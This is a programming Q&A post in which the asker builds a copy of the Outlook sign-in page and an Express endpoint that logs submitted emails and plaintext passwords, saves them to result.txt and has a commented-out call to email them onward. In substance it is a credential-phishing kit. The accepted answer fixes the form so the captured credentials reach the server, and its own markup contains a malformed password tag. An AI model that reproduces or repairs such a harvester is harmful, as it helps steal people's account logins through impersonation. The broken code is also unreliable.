# Form not sending data after Submitting in some device mostly iPhones

Tags: javascript, html, express

So basically am trying to replicate the outlook login form, that sliding effect and this is the best way i know how to do it, I wanted to get the username and password after i submit the form, but the problem is this only work in 98% of the device I have tested it on, the two percent are iPhones and a Lenovo laptop, but it also works well on other Iphones too.

```
<div id="loginForm" class="container"><img id="image" src="logo.svg">
            <div></div>
            <section id="section-main">
                <section id="section-1" class="slide-page">
                    <p id="signIn" class="field">Sign in</p><h5 id="result"></h5><input type="email" id="email" class="field" placeholder="Email, username" />
                    <p id="NoAccount" class="field">No account?<a id="linkCreateAccount" href="www.signup.com/?lic=1" style="color: #0067b8;">Create One!</a></p>
                    <p id="signInSecurityKey" class="field"><a href="www.complain.com" style="color: #0067b8;">Sign in with other method</a><i class="far fa-question-circle fa-lg" id="iconQ"></i></p>
                    <p
                        id="signInOptions" class="field"><a href="www.myaccount.com" style="color: #0067b8;">Sign-in options</a></p>
                        <p id="btnPlace" class="field"><button class="firstNext next" href="#next" type="button" id="btnSend" >Next</button></p>
                </section>
                <section id="section-2" class="page secondSlide">
                    <p id="userLine">P</p><button class="btn btn-primary btn-sm py-0 prev-1" id="btnBack" type="button" style="font-size: 12px;height: 25px;width: 26px;"><i class="la la-long-arrow-left" id="arrowBack-1" style="width: 1px;font-size: 19px;font-weight: 800;margin: -1px;"></i></button>
                    <p
                        id="enterPwd">Enter Password</p><h5 id="passResult"></h5>
                        <p><input type="password" id="password" placeholder="Password"></p>
                        <p id="keepMe">Keep me signed in</p><input type="checkbox" id="cbRemember">
                        <p id="ForgodPwd"><a href="#">Forgot password?</a></p>
                        <p id="SignWithKey"><a href="#">Sign in with other method</a></p>
                        <p id="btnSignInLocation"><button id="btnSignIn" class="submit" type="button">Sign in</button></p>
                </section>
            </section>


app.post("/userdata", (req, res, next) => {
    try {
        
        var data = `email: ${req.body.userName} password: ${req.body.password}`
        console.log(data);
        
        fs.writeFile("result.txt", data, (err) => {
            if (err) console.log(err);
            console.log("Successfully Written to File.");
           
            //emailmessenger(data);
        });
        res.sendStatus(200);
        return;
    } catch(err) {
        console.log(err.name);
        res.sendStatus(404);
        return;
    }
});
```

i have done some reading and I learnt some browsers won't tolerate me not have a form tag inside my HTML, i have tried putting the form tag but still dont work, any help will be appreciated, thanks

Answer (score 1, accepted):

There are some things that looks basic at first but when u ignore them, it will become a **problem**, it wont hurt to follow the laid down convention on creating a form, below solutions might help.

```
  <form method="post" action="/userdata">
    <div id="loginForm" class="container"><img id="image" src="logo.svg">
                <div></div>
                <section id="section-main">
                    <section id="section-1" class="slide-page">
                            <p id="signIn" class="field">Sign in</p><h5 id="result"></h5><input name="userName" type="email" id="email" class="field" placeholder="Email, username" />
                            <p id="NoAccount" class="field">No account?<a id="linkCreateAccount" href="www.signup.com/?lic=1" style="color: #0067b8;">Create One!</a></p>
                            <p id="signInSecurityKey" class="field"><a href="www.complain.com" style="color: #0067b8;">Sign in with other method</a><i class="far fa-question-circle fa-lg" id="iconQ"></i></p>
                            <p id="signInOptions" class="field"><a href="www.myaccount.com" style="color: #0067b8;">Sign-in options</a></p>
                            <p id="btnPlace" class="field"><button class="firstNext next" href="#next" type="button" id="btnSend" >Next</button></p>
                    </section>
                    <section id="section-2" class="page secondSlide">
                            <p id="userLine">P</p><button class="btn btn-primary btn-sm py-0 prev-1" id="btnBack" type="button" style="font-size: 12px;height: 25px;width: 26px;"><i class="la la-long-arrow-left" id="arrowBack-1" style="width: 1px;font-size: 19px;font-weight: 800;margin: -1px;"></i></button>
                            <p id="enterPwd">Enter Password</p><h5 id="passResult"></h5>
                            <p <input name="password" type="password" id="password" placeholder="Password"></p>
                            <p id="keepMe">Keep me signed in</p><input type="checkbox" id="cbRemember">
                            <p id="ForgodPwd"><a href="#">Forgot password?</a></p>
                            <p id="SignWithKey"><a href="#">Sign in with other method</a></p>
                            <p id="btnSignInLocation"><button id="btnSignIn" class="submit" type="button">Sign in</button></p>
                    </section>
                </section>
    </div>
 </form>
```

Below are what u should understand,

1. every input in your form should have a name
2. your input name must correspond to the name you are trying to reference in the server side.
3. add the action attribute to your form